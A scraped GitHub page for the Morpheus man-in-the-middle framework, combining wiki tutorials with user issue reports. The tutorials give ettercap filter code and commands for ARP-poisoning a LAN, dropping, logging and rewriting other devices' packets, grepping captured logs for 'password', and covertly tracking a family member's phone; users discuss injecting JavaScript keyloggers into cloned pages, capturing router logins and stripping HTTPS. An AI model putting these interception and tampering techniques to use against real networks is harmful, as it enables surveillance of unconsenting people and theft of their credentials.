Today i installed Morpheus uisng this link https://github.com/r00t-3xp10it/morpheus.git after installing when i launch it and choose an options morpheus abort tasks and restart
Please Need your help to fix this....!!!
Working on ParrotSec under KDE desktop

Now i am testing it in,
OS:-BackBox 4.5
Metasploit path:- /opt/metasploit [I've installed it manually, community version]

So now in Backbox it showing me router login page but not capturing credentials/keystroke[s].

When i launch the .sh program, it say me that i don't have Apache2.

[☠] apache2 -> not found! 
[☠] This script requires apache2 to work! 
[☠] Please run: sudo apt-get install apache 
[☠] to install missing dependencies... 

But in the settigs file, i have specified the path to Apache2 :

### APACHE2 WEBROOT (PATH)
# just change the next values to point
# to your apache2 webroot install folders.
---------------------
AP_PATH=/private/etc/apache2
---------------------

Did somebody can help me ?

How can i capture all tcp/udp traffic from specific IP and Tamper data and Re-send it ?

help please

                           - PARENTAL CONTROL FILTERS -
  This tutorial explains how to write a ettercap filter (.eft) to serve as parental control
  for those situations were we need to block the sellected device total traffic or just
  block certain domains names or ip address of beeing accessed.

blocking all traffic from: 192.168.1.71

• 1º - run ./morpheus.sh and chose option [ w ]
• 2º - write the follow funtion rule into morpheus scripting console terminal windows
  "change the ip address (192.168.1.71) by the one you want to filter"
  
• 3º - Press [ ctrl+x ] + Press [ y ] + Press [ enter ]
  
• 4º - Press [ q ] in morpheus windows to stop Arp Poison

blocking domain names: facebook.com

• 1º - run ./morpheus.sh and chose option [ w ]
• 2º - write the follow funtion rule into morpheus scripting console terminal windows
  "change the ip address (192.168.1.71) by the one you want to filter"
  
• 3º - Press [ ctrl+x ] + Press [ y ] + Press [ enter ]
  
• 4º - Press [ q ] in morpheus windows to stop Arp Poison

blocking two domain names and store logfiles

Block: facebook.com + twitter.com <-- every event trigger will be appended into logfiles

• 1º - run ./morpheus.sh and chose option [ w ]
• 2º - write the follow funtion rule into morpheus scripting console terminal windows
  "change the ip address (192.168.1.71) by the one you want to filter"

if (ip.src == '192.168.1.71' || ip.dst == '192.168.1.71') {
  if (search(DATA.data, "facebook")) {
    msg("\n[morpheus] host:192.168.1.71   [ ⊶  ]  found...");
    msg("[morpheus] | action : drop TCP (src/dst) packet ✔");
    msg("[morpheus] |   info : possible facebook connection attempt");
    msg("[morpheus] |_  decoded: facebook.com\n");
      log(DATA.data, "./facebook.log");      # <-- build logfile ettercap API 
      drop();
      kill();
  }else{
  if (search(DATA.data, "twitter")) {
    msg("\n[morpheus] host:192.168.1.71   [ ⊶  ]  found...");
    msg("[morpheus] | action : drop TCP (src/dst) packet ✔");
    msg("[morpheus] |   info : possible twitter connection attempt");
    msg("[morpheus] |_  decoded: twitter.com\n");
      log(DATA.data, "./twitter.log");    # <-- build logfile ettercap API 
      drop();
      kill();
  }
  }
}

Final Notes (tool displays):

Add allways the follow lines into your filters for display effects

• 1º - run ./morpheus.sh and chose option [ w ]
• 2º - write the follow funtion rule into morpheus scripting console terminal windows

if (ip.proto == TCP && tcp.dst == 80 || tcp.src == 80) {
    msg("[morpheus] host:ALL     [ ⊶  ]  port:80   [tcp] http ☆");
}
if (ip.proto == TCP && tcp.dst == 443 || tcp.src == 443) {
    msg("[morpheus] host:ALL     [ ⊶  ]  port:443  [tcp] https ☆");
}

Morpheus Terminal displays

Be alerted by a BEEP sound everytime the event its trigger

• 1º - run ./morpheus.sh and chose option [ w ]
• 2º - write the follow funtion rule into morpheus scripting console terminal windows
  "change the ip address (192.168.1.71) by the one you want to filter"

if (ip.src == '192.168.1.71' || ip.dst == '192.168.1.71') {
  if (search(DATA.data, "facebook")) {
    msg("\n[morpheus] host:192.168.1.71   [ ⊶  ]  found...");
    msg("[morpheus] | action : drop TCP (src/dst) packet ✔");
    msg("[morpheus] |   info : possible facebook connection attempt");
    msg("[morpheus] |_  decoded: facebook.com\n");
      log(DATA.data, "./facebook.log");
      log(DATA.data, "./beep-warning.beep"); # <-- this file creation triggers a BEEP sound
      drop();
      kill();
  }
}

• 3º - Press [ ctrl+x ] + Press [ y ] + Press [ enter ]

• 4º - sellect in execute warn.sh script? YES to emit a BEEP sound

Morpheus option [W] + Filter + warn.sh script working ..

[!] Please read this tutorial to extend your filter scripting skillz:

when is the next update since years? the tool is no more working! im testing it today because of i was not knowing this tool exist... after i learn it i figured out many options is no more working

When i clone a webpage and inject a JavaScript Keylogger into them, morpheus launch ettercap. But ettecrap return me an error: FATAL: ARP poisoning needs a non empty hosts list. Why ? Someone can help me ?

This tutorial describes how to read data from a .ecp logfile (etterlog)

change to the correct directory structure

cd morpheus/logs

Parse the log file and print a table of unique connections (port to port).

etterlog -c firewall.ecp

Display only packets matching the regex .

etterlog -e 'password' firewall.ecp

Displays information about all the hosts with the tcp port 443 open.

etterlog -t tcp -f ///443 firewall.ecp

etterlog oficial manpage

https://linux.die.net/man/8/etterlog

I use this tool to try to change images in the local lan but it doesn't work. It doesn't replace any image... You know what could be the error?

Options 13-17 are not working ("X": is not a valid option), according to the .sh, they seem to be lacking an implementation, it looks like 13 actually has an implementation but it's not linked to the menu, if that is the case, maybe they shouldn't be there as valid options yet?

I Don't what i did wrong, but he only spoof websites that dsnt have HTTPS certificate .

                       Thanks in advance ;) :)

Hi guys, when I use option 6, I get this:

Wed Jul 18 09:36:49 2018 [driftnet] warning: can't open capture/driftnet-5b4f4271643c9869.jpeg for writing
Wed Jul 18 09:36:49 2018 [driftnet] warning: can't open capture/driftnet-5b4f427166334873.jpeg for writing
Wed Jul 18 09:36:49 2018 [driftnet] warning: can't open capture/driftnet-5b4f427174b0dc51.jpeg for writing
Wed Jul 18 09:36:49 2018 [driftnet] warning: can't open capture/driftnet-5b4f427119495cff.jpeg for writing
Wed Jul 18 09:36:50 2018 [driftnet] warning: can't open capture/driftnet-5b4f42722ae8944a.jpeg for writing
Wed Jul 18 09:36:50 2018 [driftnet] warning: can't open capture/driftnet-5b4f4272625558ec.jpeg for writing
Wed Jul 18 09:36:50 2018 [driftnet] warning: can't open capture/driftnet-5b4f4272238e1f29.jpeg for writing

How do I fix this please?

Download & configurations

Download framework using git clone

git clone https://github.com/r00t-3xp10it/morpheus.git

Config morpheus settings file before runing the tool

cd morpheus && nano settings

• By default morpheus will store logfiles in .log format (write_logfiles=no), but...
  If you want a more detailed logfile creation then change the next value to YES
  and morpheus it will be abble to store logfiles in .ecp format also. (read with etterlog)
  

• Replace [pt] domain by your region code in use (optional setting)
  and you will be abble to redirect not only [.com] domains but also your region code too
  

• Use 'locate' bash command to find morpheus backend appl install paths
  example: locate etter.dns (to find the full path of etter.dns file installation)
  

• Chose to use IPV4 or IPV6 attercap ARP poison
  

warning use this funtion has last resource

Set this option to YES to force metasploit database to be rebuild.
This advanced setting its to be active in situations that your metasploit
instance can not connect to database (db_status - postgresql connected to msf)...

The above funtion will execute the follow msf core commands:

msfdb delete   <---- delete current database configuration (database.yml)
msfdb init     <------- rebuild new database configuration (database.yml)

Runing morpheus framework

chmod -R +x *.sh
chmod -R +x *.py
sudo ./morpheus.sh

Framework screenshots

framework main menu

framework option [1]

framework option [2]

framework option [6]

framework option [7]

framework option [10]

framework option [11]

framework option [12]

framework option [13]

Hi , I wish I could sniff from my Internet Service Provider . Could I do that by this tool ? and How can I connect my router ? I receive the internet through an Lite Beam Device and then distribute the internet by router . How could I sniff from the ISP using above devices ?

i actually checked the dependencies and downloaded all the things that were required
still getting "Abort current task" Error
Help neeedeeeed

This tutorial explains how to improve the 'IRC' filter

The next tutorial explains how to improve 'chat_services.eft filter', by default this
morpheus filter will only alert user of active connections, in this next tutorial we
are going to improve filter capabilitys like: detect target referer (url accesed),
detect server appl version (eg. PHP/5.0) and detect server name (Microsoft-IIS/7.5)
and build a logfile of IRC channel captured data (irc_data.log).

WARNING: morpheus allow you to improve filters in 2 diferent ways
1º - Edit filter before runing morpheus and the 'changes' will be permanent
2º - Edit filter using 'morpheus scripting console' and the changes are active only once

"In this tutorial we will edit the filter before running morpheus, making the changes permanent"

1º - prepare filter for improvements

# change to the rigth directory structure
cd morpheus/filters

# edit chat_services.eft filter
nano chat_services.eft

2º - step it will be improving 'IRC' capture displays and build a logfile with the captured data

# filter improvement
if (ip.proto == TCP && tcp.src == 194 || tcp.dst == 194) {
  msg("[morpheus] host:TaRgEt   [ ⊶  ]  port:194 irc ☆");
    if (search(DATA.data, "IRC")) {
      msg("[morpheus] | status: server referer found ☠");
      msg("[morpheus] |_ info : possible connection to IRC found ☠\n");
        # log captured data
        log(DATA.data, "./irc_data.log");
    }
}

3º - store data about port 80 traffic (referer | server version | server name)

# filter improvement
if (ip.proto == TCP && tcp.src == 80 || tcp.dst == 80) {
  msg("[morpheus] host:TaRgEt   [ ⊶  ]  port:80 http ☆");
    if (search(DATA.data, "X-Powered-By:")) {
      msg("[morpheus] | status: server version found ☠");
      msg("[morpheus] |_ logfile : morpheus/logs/irc_data.log ☠\n");
      log(DATA.data, "./irc_data.log");
    }
    if (search(DATA.data, "Referer:")) {
      msg("[morpheus] | status: server referer found ☠");
      msg("[morpheus] |_ logfile : morpheus/logs/irc_data.log ☠\n");
      log(DATA.data, "./irc_data.log");
    }
    if (search(DATA.data, "Server:")) {
      msg("[morpheus] | status: server name found ☠");
      msg("[morpheus] |_ logfile : morpheus/logs/irc_data.log ☠\n");
      log(DATA.data, "./irc_data.log");
    }
}

4º - run morpheus with the improved filter (capture data)....

5º - stop morpheus from running and open new terminal

# change to the rigth directory structure
1º - cd morpheus/logs

# remove utf-8/non-ancii caracters from output
2º - tr -cd '\11\12\15\40-\176' < irc_data.log > clean-file1.log

# store data into one bash variable (store_one and store_two and store_tre)
3º - store_one=`cat clean-file1.log | grep "Referer:"`
4º - store_two=`cat clean-file1.log | grep "X-Powered-By:"`
5º - store_tre=`cat clean-file1.log | grep "Server:"`

# display captured data to user
6º - echo "Referer: $store_one Version: $store_two Server: $store_tre"

# clean recent files
9º - rm *.log

When I try to use Option capturing https credentials (20), it give me that:

☠] checking module dependencies ..
dpkg-query: aucun paquet ne correspond à python-twisted-web
[x] python-twisted-web: not found ..

Lecture des listes de paquets... Fait
Construction de l'arbre des dépendances
Lecture des informations d'état... Fait
E: Impossible de trouver le paquet python-twisted-web

[✔] sslstrip-0.9: found ..
[✔] dns2proxy: found ..

I try to execute the command apt-get install python-twisted-web but it give me the same.
Can someone help me please?

Hey guys i think it would be excellent if you added sslstrip2 to the traffic redirect modules so we could infect browsers such ass chrome and Firefox, just a suggestion though im sure we would be very grateful if implemented.

Hi there, i have some issue, need your help. After 3 minutes using morpheus everything normal, but
after that i receive notification like this:

1. Corrupt JPEG data: 29 extraneous bytes before marker 0xd6
   Unsupported marker type 0xac
   [driftnet] warning: driftnet-58a3c9120b03e0c6.jpeg: bogus image (err = 4)

2. ERROR : 12, Cannot allocate memory
   [/build/ettercap-bGminI/ettercap-0.8.2/src/ec_threads.c:ec_thread_new_detached:210]

not enough resources to create a new thread in this process: Operation not permitted

note: ( i already have a newest ettercap)
Thanks...

Hi, when I start moroheus on kali 2017.1, no banner pop up and for any kind of filter I try, no response and I receive "abort task".

Morpheus has sslstrip not sslstrip+.Any reason not to include ssltrip+.
How about implementing dnschef as dnsproxy is slow and most of the sites don't open properly using dns2proxy.

Description of warn.sh morpheus auxiliary script

  This script will sound a BEEP IF the 'sellected event' its found ..
  The objective of this script its to assist morpheus tool to sound warnings (beep sounds)
  everytime the sellected event its trigged. HOW? cd /root/morpheus/bin && ./warn.sh

  In this case the 'event' will be the creation of Filter output: 'beep-warning.beep'
  logfile, that warn.sh script its searching (in logs folder) to emitt one sound warning
  to framework users (BEEP). It also deletes the logfile to allow the loop funtion to
  trigger another warning if the event its trigger again ..

Press this link if you desire to view the warn.sh sourcecode (optional | not needed)

Where is located the 'warn.sh' auxiliary script?

  ../morpheus/bin/warn.sh

In what situation do we use it?

  Everytime we need a morpheus filter rule to trigger one sound warning 

Can you tell me more about it?

  Morpheus uses warn.sh auxiliary script in module [17] DHCP discovery (auto)..

  But morpheus users can trigger the warn.sh auxiliary by simple add a rule
  in 'morpheus scripting console' terminal windows to write beep-warning.beep
  logfile in logs folder thats going to trigger warn.sh sound warnings ..

what 'rule' do we need to add to filter?

• The bellow API searchs inside captured packet for string: facebook
  a) The "if (search()" API its required in filter to be abble to call the 2º API that builds logs
  b) Most filters in morpheus framework, contains the "if (search()" API allready ..

  if (search(DATA.data, "facebook")) {
  

• The below API writes beep-warning.beep file in morpheus/logs
  "IF the string 'facebook' is found inside captured tcp/udp packet"

  log(DATA.data, "./beep-warning.beep");
  

• WARNING: The log(DATA() API requires the: if (search(DATA() API present.

Now that i have added the rules to my filter how can we trigger warn.sh?

• Open a new terminal windows and execute the follow command:

  cd /root/morpheus/bin && ./warn.sh
  

• Close morpheus scripting console terminal windows (save the changes)
  Press [ctrl+x] + Press [y] + Press [enter] to save filter changes
  Morpheus framework will then start mitm + dns_spoof + filter

• And have fun with events triggering a sound warning..

STEP-BY-STEP HOW TO

Improving "Block cpu crypto-minning" module filter to use warn.sh alerts ..

• 1º - run ./morpheus.sh and chose option [ 18 ]
• 2º - Add the follow rule into morpheus scripting console terminal windows
  
  WARNING: This only trigger a sound in "coinhive" events found
• 3º - start warn.sh auxiliary script (open new terminal and execute)
  
  warn.sh auxiliary script running ..
  
• 4º - Close morpheus scripting console (save changes to filter)
  Press [ctrl+x] + Press [y] + Press [enter]
  

All working together (morpheus + filter + warn.sh)..

• 5º - Press [ctrl+c] in warn.sh to stop it
• 6º - Press [q] in morpheus to stop arp poison

Final notes:

Remmenber that changing the filters of morpheus using the 'morpheus scripting console' will NOT make the changes permanent in filter.. (the filter will be reverted to is original state when the attack stops)

This tutorial explains how to detect 'daddy' mobil DHCP requests

The Dynamic Host Configuration Protocol (DHCP) is a standardized network protocol
used on Internet Protocol (IP) networks, The DHCP is controlled by a DHCP server that
dynamically distributes network configuration parameters, such as IP addresses, for
interfaces and services...

The next tutorial explains how to change firewall.eft filter to warn morpheus users
everytime a device (daddy mobil) sends a DHCP request to modem/router Announcing
its presence or requesting an ip addr to access the local lan network.

In other words it means that you will be warned everytime your daddy is arriving home
because is mobil will try to auto-connect to modem/router before he even open the door.

WARNING: morpheus allow you to improve filters in 2 diferent ways
1º - Edit filter before runing morpheus and the 'changes' will be permanent
2º - Edit filter using 'morpheus scripting console' and the changes are active only once

"In this tutorial we will edit the filter before running morpheus, making the changes permanent"

1º - step it will be detecting 'daddy' mobil hostname (nmap scan)
nmap -sn 192.168.1.0/24

2º - step it will be re-writing 'firewall.eft' filter to add 'daddy' mobil hostname
WARNING: the value to be added must be added into ip.src == '0.0.0.0' funtion

# change to the rigth directory structure
cd morpheus/filters

# edit firewall filter before running morpheus
nano firewall.eft
search for: 0.0.0.0

Now we just need to replace the 'android-7f926b4b94fd40c17' from firewall.eft
by your daddy hostname and add a 7 at the end of the value, example:
android-98fb88d184143837 + 7

3º - step running firewall filter

HINT: we dont need to input in target (daddy) ip addr because firewall filter
will detect the DHCP request made from mobil to modem/router (0.0.0.0)
and will alert you that modem have recibed a dhcp request...

How to test if the detection works?

Easy, you just need to disconnect your 'dady' mobil from network and reconnect again...

1º - run morpheus tool with the modified filter
2º - disconnect your 'dady' mobil from network and reconnect again

Special thanks: spiritedwolf

morpheus always overwrite the file /etc/ettercap/etter.conf when it start

I uncomment this lines

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

but when i start morpheus it always comment all the lines , i notice this because the script always display this message

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to EUID 0 EGID 0...

Hi, when I start morpheus on kali 2017.1,
no banner pop up and for any kind of filter I try, no response and I receive "abort task".

PS: I made a new installation from scratch of kali. Same problem.

\033[34m VERSION:\033[33m2.3\033[34m DISTRO:\033[33mKali\033[34m IP:\033[33m172.16.221.1\033[34m INTERFACE:\033[33meth0\033[34m IPv6:\033[33mACTIVE\033[34m

I am getting this type of text formate how to overcome this?

if login website hosted to the pc ip instead to router gateway than this attack is futile after all.

This tutorial describes etter filters command syntax logic

And it can be used to improve morpheus available filters
or to start write your own filter from scratch. 

WARNING: morpheus allow you to improve filters in 2 diferent ways
1º - Edit filter before runing morpheus and the 'changes' will be permanent
2º - Edit filter using 'morpheus scripting console' and the changes are active only once

filter ip address from source(src)

if (ip.src == '192.168.1.69') {
  msg("[morpheus] host:192.168.1.69   [ * ]  found");
}

filter ip address from destination(dst)

if (ip.dst == '192.168.1.69') {
  msg("[morpheus] host:192.168.1.69   [ * ]  found");
}

filter ip address from destination(dst) and(&&) from source(src)

if (ip.dst == '192.168.1.69' && ip.src == '192.168.1.69') {
  msg("[morpheus] host:192.168.1.69   [ * ]  found");
}

filter ip address from destination(dst) or(||) from source(src)

if (ip.dst == '192.168.1.69' || ip.src == '192.168.1.69') {
  msg("[morpheus] host:192.168.1.69   [ * ]  found");
}

filter protocol TCP from port 80 (src)

if (ip.proto == TCP && ip.src == 80) {
  msg("[morpheus] host:192.168.1.69   [ <- ]   port:80 http");
}

filter protocol UDP from port 53 (dst)

if (ip.proto == UDP && ip.dst == 53) {
  msg("[morpheus] host:192.168.1.69   [ -> ]   port:53 dns");
}

search for 'data' inside captured packet (search for: User-Agent)

# filter protocol and port destination/source
if (ip.proto == TCP && ip.dst == 80 || ip.src == 80) {
  msg("[morpheus] host:192.168.1.69   [ -> ]   port:80 http");
    # search for string inside captured packet
    if (search(DATA.data, "User-Agent:")) {
      msg("[morpheus] |_ status: User-Agent string found...");
    }
}

search for 'data' inside captured packet (search for: User-Agent) and store it on logfile

# filter protocol and port destination/source
if (ip.proto == TCP && ip.dst == 80 || ip.src == 80) {
  msg("[morpheus] host:192.168.1.69   [ -> ]   port:80 http");
    # search for string inside captured packet
    if (search(DATA.data, "User-Agent:")) {
      msg("[morpheus] |_ status: User-Agent string found...");
        # build logfile with captured data
        log(DATA.data, "./logfile.log");
    }
}

search for 'data' inside captured packet (search for: Host) and replace word by another one

# filter protocol and port destination/source
if (ip.proto == TCP && ip.dst == 80 || ip.src == 80) {
  msg("[morpheus] host:192.168.1.69   [ -> ]   port:80 http");
    # search for string inside captured packet
    if (search(DATA.data, "Host:")) {
      msg("[morpheus] |_ status: Host string found...");
        # replace word 'Host' by 'Pwn!' before forward packet back
        replace("Host", "Pwn!"); # note: replacement string is same length as original string
    }
}